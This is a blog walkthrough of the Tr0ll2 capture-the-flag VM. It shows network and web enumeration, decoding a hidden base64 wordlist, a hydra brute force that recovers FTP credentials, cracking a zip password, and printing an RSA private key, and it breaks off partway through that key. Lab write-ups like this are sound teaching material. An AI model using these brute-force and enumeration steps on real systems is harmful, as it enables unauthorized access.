<h2>Recon</h2>

<p>As per usual, let&rsquo;s boot up the VM and find its IP address using <code>netdiscover</code>:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# netdiscover -r 172.16.246.0/24
</span><span class='line'> Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                               
</span><span class='line'>                                                                                                                                                             
</span><span class='line'> 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240                                                                                             
</span><span class='line'> _____________________________________________________________________________
</span><span class='line'>   IP            At MAC Address      Count  Len   MAC Vendor                   
</span><span class='line'> ----------------------------------------------------------------------------- 
</span><span class='line'> 172.16.246.1    00:50:56:c0:00:01    01    060   VMWare, Inc.                                                                                               
</span><span class='line'> 172.16.246.135  00:0c:29:68:a8:92    01    060   VMware, Inc.                                                                                               
</span><span class='line'> 172.16.246.254  00:50:56:f7:73:6c    01    060   VMWare, Inc.                                                                                               </span></code></pre></td></tr></table></div></figure>


<p>And <code>nmap</code> to see what services are exposed:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# nmap -sV 172.16.246.135
</span><span class='line'>
</span><span class='line'>Starting Nmap 6.47 ( http://nmap.org ) at 2014-10-28 19:50 EST
</span><span class='line'>Nmap scan report for 172.16.246.135
</span><span class='line'>Host is up (0.00018s latency).
</span><span class='line'>Not shown: 997 closed ports
</span><span class='line'>PORT   STATE SERVICE VERSION
</span><span class='line'>21/tcp open  ftp     vsftpd 2.0.8 or later
</span><span class='line'>22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
</span><span class='line'>80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
</span><span class='line'>MAC Address: 00:0C:29:68:A8:92 (VMware)
</span><span class='line'>Service Info: Host: Tr0ll; OS: Linux; CPE: cpe:/o:linux:linux_kernel
</span><span class='line'>
</span><span class='line'>Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
</span><span class='line'>Nmap done: 1 IP address (1 host up) scanned in 24.28 seconds
</span></code></pre></td></tr></table></div></figure>


<p>As expected, webserver running on port 80. By the way, looking at software and versions nothing seems to be immediatelly exploitable and FTP server doesn&rsquo;t allow annonymous login.</p>

<h2>Enumerating the web server</h2>

<p>Let&rsquo;s have a look at the website.</p>

<p><img src="http://blog.knapsy.com/images/posts/2014-10-28-beating-the-troll-tr0ll2-writeup/troll_main.png" alt="Troll" /></p>

<p>First troll, many more to come! First thought - let&rsquo;s fire up <code>dirbuster</code> and see what it&rsquo;ll come up with. Unfortunately, it didn&rsquo;t come up with anything interesting at all.</p>

<p>Let&rsquo;s check for <code>robots.txt</code> file.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>User-agent:*
</span><span class='line'>Disallow:
</span><span class='line'>/noob
</span><span class='line'>/nope
</span><span class='line'>/try_harder
</span><span class='line'>/keep_trying
</span><span class='line'>/isnt_this_annoying
</span><span class='line'>/nothing_here
</span><span class='line'>/404
</span><span class='line'>/LOL_at_the_last_one
</span><span class='line'>/trolling_is_fun
</span><span class='line'>/zomg_is_this_it
</span><span class='line'>/you_found_me
</span><span class='line'>/I_know_this_sucks
</span><span class='line'>/You_could_give_up
</span><span class='line'>/dont_bother
</span><span class='line'>/will_it_ever_end
</span><span class='line'>/I_hope_you_scripted_this
</span><span class='line'>/ok_this_is_it
</span><span class='line'>/stop_whining
</span><span class='line'>/why_are_you_still_looking
</span><span class='line'>/just_quit
</span><span class='line'>/seriously_stop
</span></code></pre></td></tr></table></div></figure>


<p>Aha! Let&rsquo;s check is there anything interesting hiding there. I tried couple of the folders one by one, but it&rsquo;s gotten quite boring and repetitive, so I&rsquo;ve dumped all directories into <code>list.txt</code> file and crafted a very simple one-liner to do all the hard work for me :)</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# for dir in `cat list.txt`; do echo "------- $dir -------"; curl http://172.16.246.135$dir; done
</span><span class='line'>------- /noob -------
</span><span class='line'>&lt;!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"&gt;
</span><span class='line'>&lt;html&gt;&lt;head&gt;
</span><span class='line'>&lt;title&gt;301 Moved Permanently&lt;/title&gt;
</span><span class='line'>&lt;/head&gt;&lt;body&gt;
</span><span class='line'>&lt;h1&gt;Moved Permanently&lt;/h1&gt;
</span><span class='line'>&lt;p&gt;The document has moved &lt;a href="http://172.16.246.135/noob/"&gt;here&lt;/a&gt;.&lt;/p&gt;
</span><span class='line'>&lt;hr&gt;
</span><span class='line'>&lt;address&gt;Apache/2.2.22 (Ubuntu) Server at 172.16.246.135 Port 80&lt;/address&gt;
</span><span class='line'>&lt;/body&gt;&lt;/html&gt;
</span><span class='line'>------- /nope -------
</span><span class='line'>&lt;!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"&gt;
</span><span class='line'>&lt;html&gt;&lt;head&gt;
</span><span class='line'>&lt;title&gt;404 Not Found&lt;/title&gt;
</span><span class='line'>&lt;/head&gt;&lt;body&gt;
</span><span class='line'>&lt;h1&gt;Not Found&lt;/h1&gt;
</span><span class='line'>&lt;p&gt;The requested URL /nope was not found on this server.&lt;/p&gt;
</span><span class='line'>&lt;hr&gt;
</span><span class='line'>&lt;address&gt;Apache/2.2.22 (Ubuntu) Server at 172.16.246.135 Port 80&lt;/address&gt;
</span><span class='line'>&lt;/body&gt;&lt;/html&gt;
</span><span class='line'>------- /try_harder -------
</span><span class='line'>&lt;!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"&gt;
</span><span class='line'>&lt;html&gt;&lt;head&gt;
</span><span class='line'>&lt;title&gt;404 Not Found&lt;/title&gt;
</span><span class='line'>&lt;/head&gt;&lt;body&gt;
</span><span class='line'>&lt;h1&gt;Not Found&lt;/h1&gt;
</span><span class='line'>&lt;p&gt;The requested URL /try_harder was not found on this server.&lt;/p&gt;
</span><span class='line'>&lt;hr&gt;
</span><span class='line'>&lt;address&gt;Apache/2.2.22 (Ubuntu) Server at 172.16.246.135 Port 80&lt;/address&gt;
</span><span class='line'>&lt;/body&gt;&lt;/html&gt;
</span><span class='line'>
</span><span class='line'>... (truncated) ...
</span></code></pre></td></tr></table></div></figure>


<p>As you can see, quite a few of them resulted in <code>404 Not Found</code> and just a couple were invoking redirection to the same folder, but followed with <code>/</code>. I have manually visited all of them (<code>/noob/</code>, <code>/keep_trying/</code>, <code>/dont_bother</code> and <code>/ok_this_is_it/</code>) and they all contained the same image:</p>

<p><img src="http://blog.knapsy.com/images/posts/2014-10-28-beating-the-troll-tr0ll2-writeup/troll_kitty.jpg" alt="Troll Kitty" /></p>

<p>I have saved each one of them for reference (looking at source code of the pages, they were all coming from different location, so the images could really be different).</p>

<p>I have tried poking around a bit more and couldn&rsquo;t find anything else that seemed interesting, so I decided to look closer into the images, starting with the previously downloaded kitten ones. Let&rsquo;s run strings on them and see if something interesting comes up.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~/Desktop# strings cat_the_troll_dont_bother.jpg 
</span><span class='line'>JFIF
</span><span class='line'>#3-652-108?QE8&lt;M=01F`GMTV[\[7DcjcXjQY[W
</span><span class='line'>)W:1:WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
</span><span class='line'>"aq2
</span><span class='line'>\vRH
</span><span class='line'>sdwTi
</span><span class='line'>
</span><span class='line'>... (truncated) ...
</span><span class='line'>
</span><span class='line'>]=%em;
</span><span class='line'>lj\p
</span><span class='line'>*/ p?E$
</span><span class='line'>Look Deep within y0ur_self for the answer</span></code></pre></td></tr></table></div></figure>


<p>Ha! One from <code>/dont_bother/</code> contains a message! But what is it trying to tell us?</p>

<p>&ldquo;look within y0ur_self&rdquo;? Hmmm, it could be another directory on the webserver?</p>

<p><img src="http://blog.knapsy.com/images/posts/2014-10-28-beating-the-troll-tr0ll2-writeup/y0ur_self.png" alt="y0ur_self Dir" /></p>

<p>Sure it is!</p>

<h2>Dictionaries and cracking passwords</h2>

<p>Let&rsquo;s see what the <code>answer.txt</code> file contains.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>QQo=
</span><span class='line'>QQo=
</span><span class='line'>QUEK
</span><span class='line'>QUIK
</span><span class='line'>QUJNCg==
</span><span class='line'>QUMK
</span><span class='line'>QUNUSAo=
</span><span class='line'>QUkK
</span><span class='line'>QUlEUwo=
</span><span class='line'>QU0K
</span><span class='line'>QU9MCg==
</span><span class='line'>QU9MCg==
</span><span class='line'>QVNDSUkK
</span><span class='line'>QVNMCg==
</span><span class='line'>QVRNCg==
</span><span class='line'>QVRQCg==
</span><span class='line'>QVdPTAo=
</span><span class='line'>QVoK
</span><span class='line'>QVpUCg==
</span><span class='line'>QWFjaGVuCg==
</span><span class='line'>QWFsaXlhaAo=
</span><span class='line'>QWFsaXlhaAo=
</span><span class='line'>QWFyb24K
</span><span class='line'>QWJiYXMK
</span><span class='line'>QWJiYXNpZAo=
</span><span class='line'>QWJib3R0Cg==
</span><span class='line'>QWJib3R0Cg==
</span><span class='line'>QWJieQo=
</span><span class='line'>QWJieQo=
</span><span class='line'>QWJkdWwK
</span><span class='line'>QWJkdWwK
</span><span class='line'>
</span><span class='line'>... (truncated) ...</span></code></pre></td></tr></table></div></figure>


<p>Looks like base64 encoded strings. Let&rsquo;s download the file and decode them all! Once again, simple one-liner will help us out:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~/Desktop# for word in `cat answer.txt`; do echo $word | base64 -d; done &gt; answer-decoded.txt</span></code></pre></td></tr></table></div></figure>


<p>It will take a while&hellip; after all it&rsquo;s a pretty big file. Once all done, we can see that it&rsquo;s some kind of a dictionary.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~/Desktop# cat answer-decoded.txt 
</span><span class='line'>
</span><span class='line'>... (truncated) ...
</span><span class='line'>
</span><span class='line'>interpretative
</span><span class='line'>interpreted
</span><span class='line'>interpreter
</span><span class='line'>interpreter
</span><span class='line'>interpreters
</span><span class='line'>interpreting
</span><span class='line'>interpretive
</span><span class='line'>interprets
</span><span class='line'>interracial
</span><span class='line'>interred
</span><span class='line'>interrelate
</span><span class='line'>interrelated
</span><span class='line'>interrelates
</span><span class='line'>interrelating
</span><span class='line'>
</span><span class='line'>... (truncated) ...</span></code></pre></td></tr></table></div></figure>


<p>And upon further googling and researching, I found out that it seems to be a dictionary shipped by default with Ubuntu.</p>

<p>Fortunately I had Ubuntu installed and decided to grab its dictionary and compare it to the <code>answer-decoded.txt</code> file - knowing trolls, probably some new words were added that could be the clue!</p>

<p>First difference I noticed was that all apostrophies were trimmed out from <code>answer-decoded.txt</code>. Let&rsquo;s do the same for Ubuntu dictionary using a nice <code>vim</code> trick to remove everything from <code>'</code> till the end of the line:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>:%s/'[^$]*//g</span></code></pre></td></tr></table></div></figure>


<p>Ok, this will result in some duplicates, so let&rsquo;s get rid of them on both files:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~/Desktop# sort -u answer-decoded.txt &gt; answer-decoded-nodup.txt
</span><span class='line'>root@kali:~/Desktop# sort -u ubuntu-dict.txt &gt; ubuntu-dict-nodup.txt</span></code></pre></td></tr></table></div></figure>


<p>And run <code>diff</code> on them:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
<span class='line-number'>36</span>
<span class='line-number'>37</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~/Desktop# diff ubuntu-dict-nodup.txt -u answer-decoded-nodup.txt &gt; diff.txt
</span><span class='line'>root@kali:~/Desktop# cat diff.txt
</span><span class='line'>--- ubuntu-dict-nodup.txt  2014-10-28 06:25:08.083151991 -0400
</span><span class='line'>+++ answer-decoded-nodup.txt    2014-10-28 06:25:21.103151724 -0400
</span><span class='line'>@@ -2326,7 +2326,6 @@
</span><span class='line'> angry
</span><span class='line'> angst
</span><span class='line'> angstrom
</span><span class='line'>-Ångström
</span><span class='line'> angstroms
</span><span class='line'>
</span><span class='line'>... (truncated) ...
</span><span class='line'>
</span><span class='line'>@@ -34174,6 +34161,7 @@
</span><span class='line'> italics
</span><span class='line'> Italy
</span><span class='line'> Itasca
</span><span class='line'>+ItCantReallyBeThisEasyRightLOL
</span><span class='line'> itch
</span><span class='line'> itched
</span><span class='line'> itches
</span><span class='line'>@@ -43524,6 +43512,7 @@
</span><span class='line'> noon
</span><span class='line'> noonday
</span><span class='line'> noontime
</span><span class='line'>+noooob_lol
</span><span class='line'> noose
</span><span class='line'> nooses
</span><span class='line'> Nootka
</span><span class='line'>@@ -67180,6 +67169,7 @@
</span><span class='line'> trolleys
</span><span class='line'> trollies
</span><span class='line'> trolling
</span><span class='line'>+trollololol
</span><span class='line'> trollop
</span><span class='line'> Trollope
</span><span class='line'> trollops</span></code></pre></td></tr></table></div></figure>


<p>Awesome, so there are 3 strings that seem that were added to the original list:</p>

<ul>
<li>ItCantReallyBeThisEasyRightLOL</li>
<li>noooob_lol</li>
<li>trollololol</li>
</ul>


<p>We may be able to use them as passwords/usernames later.</p>

<p>After more poking around, a cup of coffee and some frustration, I wasn&rsquo;t able to squeeze out anything interesting from the <code>answer.txt</code> file or the webserver, so I moved on to focus on FTP server.</p>

<p>Having a list of <em>potential</em> usernames and passwords, I decided to perform dictionary attack on the FTP server using harvested data as below.</p>

<p><em>Note: after numerous trials and errors, frustration and doubts, I decided to add more words to the dictionary</em></p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~/Desktop# cat dict.txt 
</span><span class='line'>ItCantReallyBeThisEasyRightLOL
</span><span class='line'>noooob_lol
</span><span class='line'>trollololol
</span><span class='line'>noob
</span><span class='line'>nope
</span><span class='line'>try_harder
</span><span class='line'>keep_trying
</span><span class='line'>isnt_this_annoying
</span><span class='line'>nothing_here
</span><span class='line'>404
</span><span class='line'>LOL_at_the_last_one
</span><span class='line'>trolling_is_fun
</span><span class='line'>zomg_is_this_it
</span><span class='line'>you_found_me
</span><span class='line'>I_know_this_sucks
</span><span class='line'>You_could_give_up
</span><span class='line'>dont_bother
</span><span class='line'>will_it_ever_end
</span><span class='line'>I_hope_you_scripted_this
</span><span class='line'>ok_this_is_it
</span><span class='line'>stop_whining
</span><span class='line'>why_are_you_still_looking
</span><span class='line'>just_quit
</span><span class='line'>seriously_stop
</span><span class='line'>troll
</span><span class='line'>Tr0ll
</span><span class='line'>Tr0ll2
</span><span class='line'>Tr0ll:2
</span><span class='line'>Tr0llv2
</span><span class='line'>Maleus</span></code></pre></td></tr></table></div></figure>


<p>Let&rsquo;s use <code>hydra</code> and see if we&rsquo;ll be able to crack the username:password combination with any of those.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~/Desktop# hydra -t 30 -L dict.txt -P dict.txt 172.16.246.135 ftp -e nsr -f
</span><span class='line'>Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
</span><span class='line'>
</span><span class='line'>Hydra (http://www.thc.org/thc-hydra) starting at 2014-10-28 21:42:16
</span><span class='line'>[DATA] 30 tasks, 1 server, 990 login tries (l:30/p:33), ~33 tries per task
</span><span class='line'>[DATA] attacking service ftp on port 21
</span><span class='line'>
</span><span class='line'>[STATUS] 620.00 tries/min, 620 tries in 00:01h, 370 todo in 00:01h, 30 active
</span><span class='line'>[21][ftp] host: 172.16.246.135   login: Tr0ll   password: Tr0ll
</span><span class='line'>[STATUS] attack finished for 172.16.246.135 (valid pair found)
</span><span class='line'>1 of 1 target successfully completed, 1 valid password found
</span><span class='line'>Hydra (http://www.thc.org/thc-hydra) finished at 2014-10-28 21:43:38</span></code></pre></td></tr></table></div></figure>


<p>HAAAAAAAAAAA! Let&rsquo;s log-in using Tr0ll:Tr0ll credentials.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~/Desktop# ftp 172.16.246.135
</span><span class='line'>Connected to 172.16.246.135.
</span><span class='line'>220 Welcome to Tr0ll FTP... Only noobs stay for a while...
</span><span class='line'>Name (172.16.246.135:root): Tr0ll
</span><span class='line'>331 Please specify the password.
</span><span class='line'>Password:
</span><span class='line'>230 Login successful.
</span><span class='line'>Remote system type is UNIX.
</span><span class='line'>Using binary mode to transfer files.
</span><span class='line'>ftp&gt; ls -al
</span><span class='line'>200 PORT command successful. Consider using PASV.
</span><span class='line'>150 Here comes the directory listing.
</span><span class='line'>drwxr-xr-x    2 0        0            4096 Oct 04 01:24 .
</span><span class='line'>drwxr-xr-x    2 0        0            4096 Oct 04 01:24 ..
</span><span class='line'>-rw-r--r--    1 0        0            1474 Oct 04 01:09 lmao.zip
</span><span class='line'>226 Directory send OK.</span></code></pre></td></tr></table></div></figure>


<p>Just one file, <code>lmao.zip</code>, let&rsquo;s get it.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>ftp&gt; get lmao.zip
</span><span class='line'>local: lmao.zip remote: lmao.zip
</span><span class='line'>200 PORT command successful. Consider using PASV.
</span><span class='line'>150 Opening BINARY mode data connection for lmao.zip (1474 bytes).
</span><span class='line'>226 Transfer complete.
</span><span class='line'>1474 bytes received in 0.00 secs (2460.6 kB/s)
</span><span class='line'>ftp&gt; quit
</span><span class='line'>221 Goodbye.</span></code></pre></td></tr></table></div></figure>


<p>And unzip:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~/Desktop# unzip lmao.zip 
</span><span class='line'>Archive:  lmao.zip
</span><span class='line'>[lmao.zip] noob password: </span></code></pre></td></tr></table></div></figure>


<p>Password protected?! Ahhhhh&hellip; luckily, I had a good gut feel and got it at the first try - remember the string <code>ItCantReallyBeThisEasyRightLOL</code>? It did kinda look like password&hellip; well, it is! :)</p>

<p>As a result, we get a <code>noob</code> file, which is an RSA private key!</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~/Desktop# cat noob 
</span><span class='line'>-----BEGIN RSA PRIVATE KEY-----
</span><span class='line'>MIIEpAIBAAKCAQEAsIthv5CzMo5v663EMpilasuBIFMiftzsr+w+UFe9yFhAoLqq
</span><span class='line'>yDSPjrmPsyFePcpHmwWEdeR5AWIv/RmGZh0Q+Qh6vSPswix7//SnX/QHvh0CGhf1
</span><span class='line'>/9zwtJSMely5oCGOujMLjDZjryu1PKxET1CcUpiylr2kgD/fy11Th33KwmcsgnPo
</span><span class='line'>q+pMbCh86IzNBEXrBdkYCn222djBaq+mEjvfqIXWQYBlZ3HNZ4LVtG+5in9bvkU5
</span><span class='line'>z+13lsTpA9px6YIbyrPMMFzcOrxNdpTY86ozw02+MmFaYfMxyj2GbLej0+qniwKy
</span><span class='line'>e5SsF+eNBRKdqvSYtsVE11SwQmF4imdJO0buvQIDAQABAoIBAA8ltlpQWP+yduna
</span><span class='line'>u+W3cSHrmgWi/Ge0Ht6tP193V8IzyD/CJFsPH24Yf7rX1xUoIOKtI4NV+gfjW8i0
</span><span class='line'>gvKJ9eXYE2fdCDhUxsLcQ+wYrP1j0cVZXvL4CvMDd9Yb1JVnq65QKOJ73CuwbVlq
</span><span class='line'>UmYXvYHcth324YFbeaEiPcN3SIlLWms0pdA71Lc8kYKfgUK8UQ9Q3u58Ehlxv079
</span><span class='line'>La35u5VH7GSKeey72655A+t6d1ZrrnjaRXmaec/j3Kvse2GrXJFhZ2IEDAfa0GXR
</span><span class='line'>xgl4PyN8O0L+TgBNI/5nnTSQqbjUiu+aOoRCs0856EEpfnGte41AppO99hdPTAKP
</span><span class='line'>aq/r7+UCgYEA17OaQ69KGRdvNRNvRo4abtiKVFSSqCKMasiL6aZ8NIqNfIVTMtTW
</span><span class='line'>K+WPmz657n1oapaPfkiMRhXBCLjR7HHLeP5RaDQtOrNBfPSi7AlTPrRxDPQUxyxx
</span><span class='line'>n48iIflln6u85KYEjQbHHkA3MdJBX2yYFp/w6pYtKfp15BDA8s4v9HMCgYEA0YcB
</span><span class='line'>TEJvcW1XUT93ZsN+lOo/xlXDsf+9Njrci+G8l7jJEAFWptb/9ELc8phiZUHa2dIh
</span><span class='line'>WBpYEanp2r+fKEQwLtoihstceSamdrLsskPhA4xF3zc3c1ubJOUfsJBfbwhX1tQv
</span><span class='line'>ibsKq9kucenZOnT/WU8L51Ni5lTJa4HTQwQe9A8CgYEAidHV1T1g6NtSUOVUCg6t
</span><span class='line'>0PlGmU9YTVmVwnzU+LtJTQDiGhfN6wKWvYF12kmf30P9vWzpzlRoXDd2GS6N4rdq
</span><span class='line'>vKoyNZRw+bqjM0XT+2CR8dS1DwO9au14w+xecLq7NeQzUxzId5tHCosZORoQbvoh
